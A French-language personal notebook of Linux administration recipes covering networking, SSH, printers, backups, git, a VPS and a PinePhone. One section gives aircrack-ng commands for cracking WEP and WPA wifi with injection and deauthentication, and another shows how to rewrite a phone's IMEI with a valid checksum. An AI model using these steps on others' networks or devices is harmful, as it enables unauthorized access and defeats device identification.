----------CONFIGURATION RESEAU ---------
---------------------------------------------------------
Dans /etc/network/interfaces


source /etc/network/interfaces.d/*
auto lo
iface lo inet loopback

# nouvelle nomenclature de nommage des interfaces reseau Stretch
auto enp2s0   
iface enp2s0 inet static
   address 192.168.1.51
   gateway 192.168.1.100
   netmask 255.255.255.0



# dans stretch, ca ressemble plutot a ca :
interface enp37s0
static ip_address=192.168.1.59
static routers=192.168.1.100
static domain_name_servers=192.168.1.100



#si on ne pinge pas google
#dans /etc/resolv.conf, mettre
nameserver 192.168.1.100
nameserver 0.0.0.0

si ca réinitialise resolv.conf a chaque reboot
apt-get install resolvconf
scite /etc/resolvconf/resolv.conf.d/base 
#mettre dedans
nameserver 192.168.1.100
#puis 
service  resolvconf start








--------------------------
----------SSH ---------
--------------------------


# pour autoriser le ssh distant (demarre le service sshd)
# utile pour reagir au shutdown du central
service ssh start

Pour linux / Linux, Filezilla fait l'affaire (port 22) (ca evite d'installer et parametrer nfs)


sinon, pour autoriser la connexion en ssh de root sur le poste, 
dans /etc/ssh/sshd_config

PermitRootLogin yes



---------------------------------------
----------CLAVIER FRANCAIS ------------
---------------------------------------

Sous X : setxkbmap fr
console : loadkeys fr
sinon apt-get install console-data (se lance tout seul, sinon lancer par dpkg-reconfigure console-data)
select liste complete et azerty





---------------------------------------
---------- COMPLETION -------
---------------------------------------

# normalement, ca devrait etre deja installé
apt-get install bash-completion 


# Si la completion ne fonctionne pas, dans .bashrc, mettre


# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi






---------------------------------------------------------------------------
-------REMPLACER SYSTEMD PAR SYSVINIT------------
---------------------------------------------------------------------------

# ca c'est au cas ou ca ne serait carrement plus la. La desinst de systemd doit activer un autre gestionnaire
# de boot. Donc s'il n'y a plus du tout sysvinit, ca peut ne pas marcher.


apt-get install sysvinit-core sysvinit-utils
cp /usr/share/sysvinit/inittab /etc/inittab


Next, change the GRUB_CMDLINE_LINUX_DEFAULT line in /etc/default/grub from:

GRUB_CMDLINE_LINUX_DEFAULT="init=/bin/systemd console=hvc0 console=ttyS0"
to
GRUB_CMDLINE_LINUX_DEFAULT="init=/lib/sysvinit/init console=hvc0 console=ttyS0"


update-grub


apt-get remove --purge --auto-remove systemd
echo -e 'Package: systemd\nPin: release *\nPin-Priority: -1' > /etc/apt/preferences.d/systemd
echo -e '\n\nPackage: *systemd*\nPin: release *\nPin-Priority: -1' >> /etc/apt/preferences.d/systemd

reboot





---------------------------------------------------------
---PROGRAMMER LES SAUVEGARDES---
---------------------------------------------------------


cd /root/Projets/scripts/Shell && chmod 700 10h.sh 22h.sh


dans crontab -e


#COURANT (ne pas oublier d'echapper les % sinon le shell du crontab les interprete)
# on copie le resultat de 'env' en totalite pour ne pas avoir tous ces problemes de path


SHELL=/bin/bash
TERM=xterm
USER=root
USERNAME=root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
LANG=fr_FR.UTF-8
HOME=/root
LOGNAME=root
XDG_DATA_DIRS=/usr/share/gnome:/usr/local/share/:/usr/share/
WINDOWPATH=7
DISPLAY=:0.0
XAUTHORITY=/var/run/gdm3/auth-for-root-S2eyJD/database
COLORTERM=gnome-terminal



00 10 * * * /root/Projets/scripts/Shell/10h.sh 2>&1 >> /root/Logs/Sauvegarde-$(date +"\%Y-\%m-\%d-\%H-\%M")

00 22 * * * /root/Projets/scripts/Shell/22h.sh 2>&1 >> /root/Logs/Sauvegarde-$(date +"\%Y-\%m-\%d-\%H-\%M")

0,30 9-18 * * 1-5 pkill RsyncPermanent;/root/Projets/scripts/Shell/RsyncPermanent.sh 2>&1 >> /root/Logs/Sauvegarde-$(date +"\%Y-\%m-\%d-\%H-\%M")






raccourcis barre des taches
les enlever, en ajouter a la main : alt+clic droit


------------------------------------------------------------------------
VNC (vers LINUX MINT ou autre)
------------------------------------------------------------------------

SI on veut une session X differente par utilisateur VNC :
dans /root/.vnc.xstartup, mettre :

---------------------------------
#!/bin/sh
# Uncomment the following two lines for normal desktop:
unset SESSION_MANAGER
unset DBUS_SESSION_BUS_ADDRESS
#. /etc/X11/xinit/xinitrc
/usr/bin/mate-session

[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
xsetroot -solid grey
vncconfig -iconic &
x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
x-window-manager &
---------------------------------

lancer server avec vncserver + mot de passe
connecter avec  xvnc4viewer adresseip:1



Si on veut se connecter a la session de l'utilisateur en cours, c'est 
cote serveur  : 
dans les .profile
x11vnc -display :0 -forever -q -bg   #-usepw  pour acces distant securisé



cote client
vncviewer -LowColorLevel=1 -geometry 500x350 -sendClipboard=0 -AcceptClipboard=0




acces distant : creation d'un mot de passe fort
x11vnc -storepasswd
ouvrir les ports NAT dans les routeurs
ajouter -usepw  a la ligne qui lance x11vnc



------------------------------------------------------------------------
IMPRESSION SUR KONICA MINOLTA BIZHUB C203 ( C353 SERIES)
------------------------------------------------------------------------
------------------------------------------------------------------------
DEPRECATED
------------------------------------------------------------------------

Le driver est dans dbhc203psc200en.tgz

# décompresser
tar xvf dbhc203psc200en.tgz 

# mettre le ppd dans /usr/share/cups/model
cp pbhc203psc200en.ppd /usr/share/cups/model/

# et le filtre (femperon-truc.pl) dans /usr/lib/cups/filter
cp femperonpsc250mu.pl  /usr/lib/cups/filter/


Dans la page d'administration de CUPS (localhost:631)
ajouter une nouvelleimprimante. Ne pas prendre la version lpd / lpr mais la derniere en bas (SOCKET)   --  APPSocket / HP Jetdirect ?? 

le socket est (de mémoire) socket://192.168.1.30
et ca marche.. (pour la page de test en tous cas)

Options de bac a papier tray1 pour blanc Tray 2 pour entete
c'est dans les "set options" / menu general


------------------------------------------------------------------------
IMPRIMANTE PDF
------------------------------------------------------------------------

apt-get install cups-pdf

# modifier /etc/cups/cups-pdf.conf :
Out ${HOME}/Bureau
ou si c'est le serveur
Out ${HOME}/Server/Sauvegarde-MajSituations/Data/Pieces  (a peu pres)




------------------------------------------------------------------------
IMPRESSION SUR TRIUMPH ADLER 2506CI
------------------------------------------------------------------------

linux driver ppd la ou il faut
cp /mnt/nas/Luc/Logiciels/Drivers/Imprimante\ Triumph\ Adler\ 2506CI/TA2506ci.PPD /usr/share/cups/model/


xp : choisir le driver KX pour 32 bits


Parametrages 
(dans localhost:631  ?)
	Selectionner type de papier Normal ou AEntete selon les bacs, le type de papier est programmé 
	sur l'imprimante, donc pas de selection de magasin, ca se fait en fonction du papier declaré
	
	Selectionner Noir et Blanc, sinon par defaut c'est du couleur
	
	dans type de bords, mettre aucun (ni bords courts, ni bords long qui declenchent le recto verso)
	
	









------------------------------------------------------------------------
LANCER UNE APPLICATION AVEC INTERFACE GRAPHIQUE APRES LE CHARGEMENT XFCE
------------------------------------------------------------------------


Application / Parametres/Session et demarrage/Ajouter un raccourci

ou sinon dans .config/autostart/
creer un (exemple) MyProd.desktop contenant :

[Desktop Entry]
Encoding=UTF-8
Version=0.9.4
Type=Application
Name=MyProd
Comment=MyProd
Exec=/root/Client/MyProd/LanceurMyProd.sh
OnlyShowIn=XFCE;
StartupNotify=false
Terminal=false
Hidden=false


creer le script qui lance le programme (pas possible de le lancer en direct apparemment ..)

/root/Client/MyProd/LanceurMyProd.sh : 

#! /bin/bash
sleep 1 && cd /root/Client/MyProd/ && DISPLAY=:0 nohup ./MyProd_Project &



------------------------------------------------------------------------
#   ENVOI DE MAILS AUTOMATIQUE POUR LE PC MYCIEL GESTION (envoi de mail avec le menu) ou le SERVEUR WEB
------------------------------------------------------------------------
 Les fichiers de configuration ssmtp a copier revaliases et ssmtp.conf sont dans 
 /Projets/scripts/Shell/Ssmtp-SendMailCommandLine

apt-get install -y sharutils ssmtp





------------------------------------------------------------------------
#   RECHERCHE DES SOURCES DE RALENTISSEMENT
------------------------------------------------------------------------

apt-get install -y linux-tools

perf record -g -a sleep 10 && perf report















-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
LES DOCS DIVERSES
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------
-------------------------------------------------




---------------------------------------------------------
-----SON ALSA VERS OSS (ACCES DIRECT)--------------------
---------------------------------------------------------

apt-get install alsa_utils
alsamixer pour regler le son
alsactl init   pour demarrer le truc.



# attention, ca flingue le son dans vlc...
# parametrage son : on passe de pulse / alsa vers OSS
dpkg-reconfigure linux-sound-base
# passer a oss
apt-get remove pulseaudio
apt-get install oss4-base oss4-dkms oss4-dev oss4-gtk
apt-get remove alsa-base 
#facultatif :  apt-get install pulseaudio

pour tester oss : cat /dev/urandom > /dev/dsp


dans ~/.asoundrc :

pcm.!default
 {
   type oss
   device /dev/dsp
 }
 mixer.!default
 {
   type oss
   device /dev/dsp
 }






---------------------------------------------------------
-----------ENCODER SOUS TITRES VIDEO---------------------
---------------------------------------------------------


Pour encoder un fichier de sous titres dans une video

mencoder -sub /home/fi/Bureau/FlashMob/Master.srt -fontconfig -font Arial -subfont-text-scale 4  -subcp enca:fr:latin9 -oac mp3lame -lameopts cbr=128 -ovc lavc -xvidencopts bitrate=900 /home/fi/Bureau/FlashMob/Master.MP4 -o MasterFr.avi



---------------------------------------------------------
---------------------GIT---------------------------------
---------------------------------------------------------

*****Creation d'un projet GIT

mkdir ~/mon_projet
cd ~/mon_projet
touch .gitignore
git init
git add .
git commit -a -m'first commit'

*****Creation du depot de reference
	
cd ~/mon_projet
git clone --bare . ~/mon_projet.git
cd ~/mon_projet.git
git --bare update-server-info
cd hooks/
mv post-update.sample post-update
chmod a+x post-update

*****Copie sur le serveur
scp -r ~/mon_projet.git memophar@ftp.memo-pharma.fr:~/
rm -Rf ~/mon_projet*


*****Utilisation du depot de reference
git clone ssh://memophar@ftp.memo-pharma.fr/~/Projets.git
git clone ssh://memophar@ftp.memo-pharma.fr/~/Sauvegarde.git
git add . && git commit -a -m'toto' && git push

concretement, quand le projet est trop gros, plutot le copier avec filezilla
puis cloner depuis la copie locale, et dans la version decompressee, corriger le fichier de config
pour faire pointer sur le .git du serveur internet (voir ci dessous)


--------------------------------------------------------
----------CONFIGURATION GIT----------------
--------------------------------------------------------

dans Projets/.git/config

[core]
	repositoryformatversion = 0
	filemode = false
	bare = false
	logallrefupdates = true
	symlinks = false
	ignorecase = true
	hideDotFiles = dotGitOnly
	autocrlf = false	
	quotepath = off
[remote "origin"]
	fetch = +refs/heads/*:refs/remotes/origin/*
	url = ssh://root@152.228.172.80/~/Projets.git
	
[branch "master"]
	remote = origin
	merge = refs/heads/master
[i18n]
	logoutputencoding = utf8
	commitencoding = utf8


Dans ~/.gitconfig

[user]
	name = Your Name
	email = you@example.com





anciennement 
#	url = ssh://memophar@ftp.memo-pharma.fr/~/Projets.git


sous windows 
	autocrlf = true




------------------------------------------------------------------------
PROBLEMES GIT
------------------------------------------------------------------------
annuler changements non commites pour pull tranquille
git stash
git status


Tout annuler et prendre la version internet (le git pull --fermeTaGueule)

git log pour voir un vieux commit 
git reset --hard 2145F12D...   ca revient a ce commit
git clean -df     ca enleve les fichiers pas suivis (rajoutes, etc..)
git pull




erreur git
	"fatal: protocol error: bad line length character:"
en meme temps, avec rsync erreur
	protocol version mismatch -- is your shell clean?
	(see the rsync man page for an explanation)
	rsync error: protocol incompatibility (code 2) at compat.c(178) 
Ces 2 erreurs laissent penser qu'il s'agit encore d'un update du serveur fait en automatique par ovh
ssh memophar@ftp.memo-pharma.fr
ca arrette tout de suite, mais un 
ssh -v memophar@ftp.memo-pharma.fr 
reussit a se connecter.
reessayer git et rsync apres ce ssh fonctionne, mais pas longtemps
contacter ovh pour voir quelle mise a jour ils ont faite sur ssh, ou s'il faut de nouvelles cles toujours plus solides



problemes de find e ligne LF (linux et mac) ou CRLF (windows)
dans windows, faire 
git config --global core.autocrlf true





------------------------------------------------------------------------
CREER ET PARTAGER UNE CLE SSH
------------------------------------------------------------------------

ssh-keygen -t rsa -b 4096 -a 100
       passphrase vide
ssh-copy-id memophar@memo-pharma.fr:

??
ssh-agent sh -c 'ssh-add < /dev/null && bash'


test :
ssh memophar@ftp.memo-pharma.fr



------------------------------------------------------------------------
AFFICHAGE
------------------------------------------------------------------------

problemes de résolution resolution  definition définition ecran écran



SOLUTION 1 ---------------------
Pour la definition d'ecran qui deconne (pas possible de la modifier dans les parametres
creer / ajouter dans /etc/X11/xorg.conf
(les horizsync et vertrefresh doivent etre cherches sur internet pour l'ecran)
Testé 2020 12 08 sur une buster récalcitrante, a fonctionné tel quel.

Section "Monitor"
   # HorizSync source: builtin, VertRefresh source: builtin
   Identifier "Monitor0"
   VendorName "Samsung"
   ModelName "SyncMaster 920N"
   HorizSync 30.0 - 70.0
   VertRefresh 60.0
   Option "DPMS"
EndSection



Section "Screen"
    Identifier  "Screen0"
    Device      "ATI Graphics Adapter"
    Monitor     "Monitor0"
    DefaultDepth 24
    Option "backingstore"

    Subsection "Display"
        Depth       24
        Modes       "1024x768"
        ViewPort    0 0  # initial origin if mode is smaller than desktop
#       Virtual     1280 1024
    EndSubsection
EndSection


SOLUTION 2 ---------------------

autre solution pour revenir a la version sans parametres, qui en general marche :
Sortir de X : ctrl At F1 - se logger - /etc/init.d/gdm3 stop
PUIS, APRES,   rm -r ~/.gnome2  ~/.gconf 
reboot


SOLUTION 3 ---------------------
creer ~/.config/monitors.xml
pour Forcer a essayer la bonne resolution avec dedans : 
<monitors version="1">
  <configuration>
      <clone>no</clone>
      <output name="default">
          <vendor>???</vendor>
          <product>0x0000</product>
          <serial>0x00000000</serial>
          <width>1024</width>
          <height>768</height>
          <rate>0</rate>
          <x>0</x>
          <y>0</y>
          <rotation>normal</rotation>
          <reflect_x>no</reflect_x>
          <reflect_y>no</reflect_y>
          <primary>yes</primary>
      </output>
  </configuration>
</monitors>


SOLUTION 4 ---------------------

Supprimer /etc/X11/xorg.conf
et laisser faire le noyau
Noyau qui marchent : 3.7
ne marchent pas : 3.10  3.12   3.14  3.16.3
pas encore teste 3.17 et ulterieur



SOLUTION 5 ---------------------
sinon xrandr -s 1024x768   par exemple
ou xrandr -o left            ou right normal




SOLUTION 6 ---------------------
Passer par les drivers officiels non-free.
apt install hardinfo pour connaitre la carte video (AMD/ATI ou autre)
Donc on installe firmware-linux-nonfree  pour les cartes AMD (pas essaayé pour autre carte) dans depot non-free
PC puissant de dev perso : carte Caicos XT Radeon HD 7470/8470 / R5 235/310 OEM ATI/AMD





---------------------------------------------------------
PIRATAGE WIFI
---------------------------------------------------------

clic sur icone reseau dans barre haut donne les reseaux detectes
iwconfig montre les liaisons dispo (le rausb0 est plutot remplace par le vrai nom de la connexion)


---------------------------------------------------------
-------------------------  WEP  -------------------------
---------------------------------------------------------
console 1 :

airmon-ng start rausb0   (passe mode monitor)
cd /mnt/sdb1/DATA/Doc/
airodump-ng rausb0  (pour choper le channel et bssid)
airodump-ng --write toto --channel 1 --bssid 00:14:A5:E2:38:3D rausb0 (pour enregistrer les IV's)


console 2 :

aireplay-ng -1 0 -e MemoWifiNetwork -a 00:14:A5:E2:38:3D rausb0  (fake auth, pas oblige)
aireplay-ng -3 -e MemoWifiNetwork -b 00:14:A5:E2:38:3D rausb0  (injection, doit choper un arp)


console 3 :

cd /mnt/sdb1/DATA/Doc/
aircrack-ng toto-01.cap  (ou *.cap)


---------------------------------------------------------
-------------------------  WPA  -------------------------
---------------------------------------------------------

console 1 : 

airmon-ng start rausb0   (passe mode monitor)
cd /mnt/sdb1/DATA/Doc/
airodump-ng rausb0  (pour choper le channel et bssid)


console 2 :

aireplay-ng -0 5 -a 00:14:A4:30:20:56 rausb0



 CD:6C:C8:B7:94:90:8B:0E:41:4C:A6:C5:CA



---------------------------------------------------------
-------------------------  TOUT AUTOMATIQUE -------------
---------------------------------------------------------

fern-wifi-cracker

(mais bon, c'est moins fun...)






------------------------------------------------------------------------------------------------------------------
-------------------------  SUPPRIMER LES RACCOURCIS XFCE Ctrl F2, etc..-------------
------------------------------------------------------------------------------------------------------------------

dans 
scite ~/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-keyboard-shortcuts.xml 

enlever les ctrlF1 a ctrl F12 qui sont lies au changement de workspace (chercher workspace dans le fichier)

ou enlever juste les ligne concernant ctrl F2






------------------------------------------------------------------------------------------------------------------
-------------------------  SUPPRIMER XFCE -------------
------------------------------------------------------------------------------------------------------------------

apt-get purge libxfce4util-common
ca enleve tout le reste
un petit apt-get autoremove derriere et c'est ok







---------------------------------------------------------
-------------ANCIENS TRUCS-------------------------------
---------------------------------------------------------



Autologin root
# rungetty pour l'autologin root (backtrack 5)
apt-get install rungetty && sed -i -e "s/exec \/sbin\/getty -8 38400 tty1/# exec \/sbin\/getty -8 38400 tty1/g" /etc/init/tty1.conf && echo "exec /sbin/rungetty tty1 --autologin root" >> /etc/init/tty1.conf

autologin root Debian (ancien)
dans /etc/pam.d/gdm3 , mettre en commentaire (4eme ligne) : 
#auth   required        pam_succeed_if.so user != root quiet_success 
 





# parametrage des applications au lancement / Devilspie
cp ~/Projets/Docs/Scripts/Devilspie/.open_apps.sh  ~/.open_apps.sh && chmod 777 ~/.open_apps.sh
mkdir ~/.devilspie
cp ~/Projets/Docs/Scripts/Devilspie/*.ds ~/.devilspie/
Systeme > Preferences > Startup Applications
ajouter ~/.open_apps.sh











---------------------------------------
--BEAGLEBONE BLACK-------
---------------------------------------


Beaglebone black
clavier francais
loadkeys fr
setxkbmap fr
sinon
apt-get install console-data (se lance tout seul, sinon lancer par dpkg-reconfigure console-data)
select liste complete et azerty

supprimer X
apt-get purge libx11.* libqt.* -y


faire du propre
apt-get update
apt-get dist-upgrade -y
apt-get autoremove -y --purge
apt-get autoclean
apt-get purge -y $(deborphan --guess-all)



changer les cles ssh par defaut
rm -rf /etc/ssh/ssh_host_*
dpkg-reconfigure openssh-server
service ssh restart


 
 
 
 
 
 
 
---------------------------------------------------------
Thunar lent au demarrage,
---------------------------------------------------------
aller dans /usr/share/gvfs/mount
et dans (tous ?) les fichiers, mettre automount a false

ou  apt-get install pcmanfm  
et indiquer pcmanfm comme explorateur de fichiers préféré dans Parametres / Applications Favorites / Utilitaires





---------------------------------------------------------
CONVERTIR LES FICHIERS TEXTE EN UTF8
---------------------------------------------------------
iconv -f ISO-8859-1 -t UTF-8 source.txt -o fichier_encode.txt







---------------------------------------------------------
DESACTIVER LES MISES A JOUR AUTOMATIQUES DEBIAN STRETCH
---------------------------------------------------------
systemctl stop apt-daily.timer
systemctl disable apt-daily.timer
systemctl disable apt-daily.service
systemctl daemon-reload





---------------------------------------------------------
DEVELOPPEMENT ANDROID
---------------------------------------------------------

installation android-studio : je me rappelle plus trop comment j'ai fait,
Je note juste les dernieres conneries en cours.

2 repertoires dans /opt : 
android-studio et jdk
ils ont surement ete telechargés et dezippes la.

on lance android-studio avec /opt/android-studio/bin/studio.sh
ca fait et l'install et le lancement





A la creation d'un nexus 5s, erreur creating AVD, solution 
apt-get install lib32stdc++6




make crossinstall CPU_TARGET=arm OS_TARGET=linux CROSSBINDIR=/opt/ndk/android-ndk-r16/toolchains/arm-linux-androideabi-4.9/prebuilt/linux-x86_64/arm-linux-androideabi/bin OPT=-dFPC_ARMEL INSTALL_PREFIX=/opt/fpc


---------------------------------------------------------
DEVELOPPEMENT EN JAVA SOUS ECLIPSE 
---------------------------------------------------------


ajouter dans sources.list
deb http://httpredir.debian.org/debian jessie-backports main

#java 8
apt-get update && apt-get install openjdk-8*


chercher sur google eclipse NEON
telecharger la version java 64 bits linux
mettre le tar.gz dans /opt et le decompresser.
Lancer ./eclipse



---------------------------------------------------------
COMMANDES POMMIES SHIFER
---------------------------------------------------------

passer d'un pdf pourri a du texte : 
apt-get install -y tesseract-ocr tesseract-ocr-fra

convert -density 300  cde.pdf[0] cde0.png &&  tesseract cde0.png tst0 -l fra
convert -density 300  cde.pdf[1] cde1.png &&  tesseract cde1.png tst1 -l fra
convert -density 300  cde.pdf[2] cde2.png &&  tesseract cde2.png tst2 -l fra
...



---------------------------------------------------------
Capture d'ecran 
---------------------------------------------------------
outil dans image magick je crois
import toto.jpg




---------------------------------------------------------
benchmark test vitesse performance
---------------------------------------------------------
sysbench --test=cpu --num-threads=16 run

Gros pc 2021 Décembre score : 10 secondes



---------------------------------------------------------
Outils PDF
---------------------------------------------------------
découper un pdf en toutes ses pages split burst
pdftk monpdf.pdf burst

coller 2 à n pdf
pdftk pdf1.pdf  pdf2.pdf output resultat.pdf






---------------------------------------------------------
Script pour détecter les fichiers qui ne sont pas en lecture pour rsync distant.
A lancer régulierement sur Projets et DocsBoulot
---------------------------------------------------------

find . -perm 600 | while read line; do echo "$line"; chmod 644 "$line"; done




outlook taille fichier depasse 2 Go
regarder le path dans 10h.sh
lancer outlook avec /safe (msimnn.exe?? /safe)



------------------------------------------------------------
VIDEO SURVEILLANCE
------------------------------------------------------------

Camera ip adress 192.168.1.110  port 88 partagé pour logiciel de collecte





------------------------------------------------------------
ROUTEUR TP LINK   TL R600 VPN
------------------------------------------------------------

Adresse usine 192.168.0.x

ports a ouvrir 500 udp et 4500 udp, ce sont les ports par lesquels le trafic vpn passe d'apres microsoft





------------------------------------------------------------
SYNOLOGY NAS CONFIGURATION
------------------------------------------------------------

Pour supprimer Synology Finder (analyse contenu par google analytics sous contrat de confidentialité ... lol)

SSH into your Synology and do the following.
sudo -i
synoservicecfg --disable pkgctl-SynoFinder
synopkg uninstall SynoFinder
logout





LDLC cubic mp1 mp3
Disque dur non détecté : un dd /dev/zero sur le disque (par live gparted) suivi d'un format gparted en fat32
permet la redetection du disque par l'installeur débian





-----------------------------------------------------------
VIRT MANAGER Machines virtuelles kvm libvirt
-----------------------------------------------------------

apt-get install qemu-kvm libvirt0 virt-manager

pb réseau : le bridge déconne a chaque lancement.

essais : ifonfig virbr0 down
apt-get remove --purge qemu-kvm libvirt0 virt-manager
apt-get install qemu-kvm libvirt0 virt-manager




-----------------------------------------------------------
UEFI - Installation sur disque dur de Debian
-----------------------------------------------------------

Si apres installation, il n'y a pas de menu pour choisir le systeme a lancer.
C'est probablement un pb d'EUFI
Selectionner le disque rapide 128 Go
Enlever les autres options de boot dans le bios
Se taper toutes les options de securité et uefi des bios modernes qui bloquent tout





-----------------------------------------------------------
BLUETOOTH
-----------------------------------------------------------
Connexion plug semble fonctionner tout seul (ou ?)

a la maison
apt-get install bluetooth
service bluetooth start

apt-get install bluedevil  (kde)  blueman (gtk)  ou gnome-bluetooth (gnome)

dans les menus, chercher Applications/parametres/Gestionnaire bluetooth
si necessaire supprimer le casque, et rechercher. 
accepter le pairing (boutoon drit - conecter sur casque et notification ok



autres..
	apt-get install pulseaudio-module-bluetooth   
	pactl load-module module-bluetooth-discover ??
	pavucontrol   et mettre  le casque bt par defaut








-----------------------------------------------------------
PARAMETRAGE VPS
-----------------------------------------------------------

SITE WEB
	apt-get install apache2 php7.4     # pour site
	apt-get install  gcc g++ make      # pour node.js et npm

	SYMLINK dans /var/www/html  vers le repertoire de dev
		ln -s /root/www  /var/www/html/MemoSSL
		
		Dans  /etc/apache2/sites-available/000-default.conf
			DocumentRoot /var/www/html/MemoSSL


	PERMISSIONS Apache : groupe www-data
		chown -R root:www-data /root      # www-data est groupe proprietaire e du chemin a cause du symlink
		chmod -R 750 /root                      #droits X sur la totalite du chemin a cause du symlink
		chmod g+s /root/www  #Les fichiers crees par le site matchent les bonnes permissions
		chmod -R g+w  /root/www/Data/ClientsData/Paniers/ 


	HTACCESS VPS 
		Permettre le RewriteEngine (réécrit les url pour par exemple forcer a passer en https)
			a2enmod rewrite

		dans /etc/apache2/apache2.conf   //  
			dans <directory /var/www/html>
				AllowOverride All     # l'htaccess  override les parametrages apache
				Followsymlink All    # pour le lien symbolique /var/www/html/MemoSSL

		nano /root/www/.htaccess 
			#SetEnv PHP_VER 5_TEST
			SetEnv REGISTER_GLOBALS 0
			SetEnv SESSION_USE_TRANS_SID 0
			RewriteEngine On
			RewriteCond %{SERVER_PORT} 80
			#RewriteRule ^(.*)$ https://www.fiston.fr/$1 [R,L]
		nano /root/www/Data/.htaccess
			order deny,allow
			deny from all
			allow from localhost
			A NOTER : depuis apache 2.4, ca devrait etre des RequireAll, RequireAny, et RequireNone

	STRIPE
		installer le CLI
			#le telecharger sur le site de stripe, et l'installer
			dpkg -i stripe_1.5.14_linux_amd64.deb 

		Installation Node.js
			curl -sL https://deb.nodesource.com/setup_12.x -o nodesource_setup.sh  #version 12 minimum pour stripe)
			chmod +x nodesource_setup.sh 
			./nodesource_setup.sh 
			apt-get install -y nodejs

		Creer Webhook Serveur pour communiquer avec stripe depuis le serveur
			#utilisation du CLI stripe pour faciliter l'installation avec tout a sa place
			stripe samples create developer-office-hours
			cd developer-office-hours/server/
			# parametrage local du server.js, téléchargement des dépendances
			npm install 
			# execution simple
			node server.js
			
		SERVER.JS
			Le parametrer pour qu'il fasse ce qu'on veut
			
			









			

	
	VERIFIER LES CONNEXIONS PÏRATES
		cat /var/log/auth.log | grep Failed | wc -l
	
	
	
	



SSH sur le serveur
	Pour creer une clé RSA si le poste n'en a pas 
		ll /root/.ssh
		ssh-keygen -t rsa -b 4096 -a 100
	Sur chaque poste ayant acces
		ssh-copy-id root@fiston.fr
		
	APRES AVOIR ECHANGE TOUTES LES CLES (donc pas en cours de parametrage)
		dans /etc/ssh/sshd_config		
		#PermitRootLogin yes
		PermitRootLogin without-password
		







-----------------------------------------------------------------
PARAMETRAGE SERVEUR LOCAL MYCIELGESTION MYARTICLE MYCLIENT MYSUIVIPAIEMENTS SAUVEGARDES
-----------------------------------------------------------------

	Copier les dernières données
		MyCielGestion
		MyClient
		MyArticles
		MySuiviPaiements

	Sauvegarde
		Faire un /etc/fstab propre
		derouler le protocole standard
		
	Cron
		Verifier la table CRON pour les Sauvegardes 
		
	Autorisations d'acces en lecture partout pour pouvoir sauvegarder
	
	apt-get remove plymouth avahi-daemon
	
	apt-get remove popularity-contest
	


	xfdesktop 4.12 ne fonctionne pas bien avec thunar 1.8.x
	il faut soit ugrader xfdesktop a 4.13 ou downgrader thunar a la v 1.6
	symptomes : impossible de lancer fichier desktop ou de creer fichier et repertoire sur le bureau


	Imprimantes
		ne pas oublier cups-pdf : imprime les factures pdf des clients
			/etc/cups/cups-pdf.conf
				modifier out 
				mettre truncate a 12, sinon ca rajoute des putains de suffixes
			
			out devient genre /root/Server/Sauvegarde-MajSituations/Data/pieces
			dans localhost:631 / maintenance / parametres de l'imprimante, enlever le suffixe
                        
			


-----------------------------------------------------------------
ENCODAGE VIDEO MP4 VERS MP3
-----------------------------------------------------------------
ffmpeg -i fichier.mp4   sortie.mp3





-----------------------------------------------------------------
PinePhone Mobian + phosh
-----------------------------------------------------------------
	OpenStreetMap
		Cartes OSM télécharger : 
		
		Cartes OSM transformer le format pbf en bin pour NAVIT (offline)
			maptool --protobuf -i my_OSM_map.osm.pbf my_Navit_map.bin
			
		
	Modem inaccessible 
		service eg25-manager restart
		et attendre un peu.
		
	Utilisation du miroir
	
	
	Flasher firmware du modem
		https://github.com/Biktorgj/pinephone_modem_sdk.git
		se connecter en tant qu'utilisateur non root
		./init.sh && make everything
		si erreur manque en.us.utf8
			dpkg-reconfigure locales
			ajouter en et fr
		
		sur pinephone 
			apt install adb fastboot
			copier le repertoire target apres compilation
			./flashall
			
	Changement IMEI
		8 chiffres dans la liste des tac autorisés
		6 serial number
		cheksum  luhn algorithme
		L'algorithme de Luhn commence par la fin du numéro. Prendre le dernier chiffre et se déplacer vers la gauche. Doubler la valeur de tous les chiffres de rang pair. Si le double d'un chiffre est supérieur ou égal à 10, le remplacer par la somme de ses chiffres. Réaliser la somme s de tous les chiffres obtenus. La clé de contrôle c est égale à c=(10−(smod10)mod10)
		Exemple : 853
			Prendre le 3, le doubler pour obtenir 6.
			Prendre le 5, non doublé.
			Enfin, doubler le 8 (8*2=16 et 1+6=7) pour obtenir 7.
			La somme est 6+5+7 = 18. Comme 18 modulo 10 = 8, calculer 10 - 8 = 2, la clé de contrôle X est donc 2. Ainsi 8532 est valide selon Luhn. 
			original pinephone imei : 867698047754414
		mmcli -m 0 --command='AT+EGMR=0,7'
		mmcli -m 0 --command='AT+EGMR=1,7,"123456781234568"'
		mmcli -m 0 | grep "equipment id" | tail -c 16
		
		Conclusion : Il ne faut le changer qu'une fois de temps en temps, et avec un code constructeur 86769804
	
	
		
		
		
-----------------------------------------------------------------
crash de firefox et brave sur les videos youtube et odysee
-----------------------------------------------------------------
	Ca n'est pas le navigateur, le vpn 
	solution : update debian avec contrib et non-free qui mettent ajour les drivers video



-----------------------------------------------------------------
Installation Brave Browser
-----------------------------------------------------------------


apt install apt-transport-https curl

curl -fsSLo /usr/share/keyrings/brave-browser-archive-keyring.gpg https://brave-browser-apt-release.s3.brave.com/brave-browser-archive-keyring.gpg

echo "deb [signed-by=/usr/share/keyrings/brave-browser-archive-keyring.gpg arch=amd64] https://brave-browser-apt-release.s3.brave.com/ stable main"|sudo tee /etc/apt/sources.list.d/brave-browser-release.list

apt update && apt install brave-browser




-----------------------------------------------------------------
VERIFICATION FUITES DNS
-----------------------------------------------------------------
	nslookup couille




-----------------------------------------------------------------
EDDIE-UI  Airvpn
-----------------------------------------------------------------
apt install ./dpkg -i eddie-ui_2.20.0_linux_x64_debian.deb 


 libappindicator1  n'est dispo que sur buster donc passer temporairement sur buster, juste pour ca.
 puis
 apt-get install -f
 



